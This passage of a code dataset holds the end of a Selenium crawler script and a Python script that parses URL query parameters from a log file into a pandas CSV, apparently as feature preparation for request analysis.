and run the script\nnow = str(int(time.time()))\ndriver = webdriver.Firefox()\n#sys.stdout = open('log/stdout'+now+'.txt', 'w')\nsys.stderr = open('log/stderr'+now+'.txt', 'w')\nrunScript()\n","sub_path":"bachelor project/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"347448925","text":"# -*- coding:utf-8 -*-\n\nimport sys\nimport urllib\n#import urlparse\nimport re\nfrom hmmlearn import hmm\nimport numpy as np\nfrom sklearn.externals import joblib\n#import HTMLParser\nimport nltk\nimport csv\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\ndef fun(x):\n return x\n\nif __name__ == '__main__':\n data = open('../txt/slb.txt',encoding='utf8')\n argsName = set()\n for line in data.readlines():\n if len(line.split('&')) > 1:\n inputs = line.split('&')\n # print(inputs)\n for input in inputs:\n if len(input.split('=')) > 1:\n argsName.add(input.split('=')[0])\n argsName = list(argsName)\n lst = np.zeros((1, len(argsName)))\n print(lst)\n\n Dish = pd.DataFrame(data=lst,columns=argsName)\n # print(Dish.columns)\n\n\n data = open('../txt/slb.txt', encoding='utf8')\n for line in data.readlines():\n if len(line.split('&')) > 1:\n inputs = line.split('&')\n # print(inputs)\n tmpDish = pd.DataFrame(data=lst,columns=argsName)\n for input in inputs:\n if len(input.split('=')) > 1:\n Name = input.split('=')[0]\n Value = input.split('=')[1].replace('\\r\\n', '')\n Value = input.split('=')[1].replace('\\n','')\n if Value== '':\n Value = 0\n tmpDish[Name] = Value\n Dish = Dish.append(tmpDish)\n # print(Dish.head())\n print(Dish.head())\n Dish = Dish.fillna(0)\n Dish = Dish.replace(0.0, 0)\n Dish = Dish.reset_index(drop=True)\n# Dish = Dish.iloc[1:]\n Dish.to_csv('../csv/slb.csv',encoding='utf8')\n\n\n","sub_path":"NewCodeProbe/makeArgsCsv.py","file_name":"makeArgsCsv.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
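\n    # build a one-row, all-zero DataFrame whose columns are every argument name collected from the log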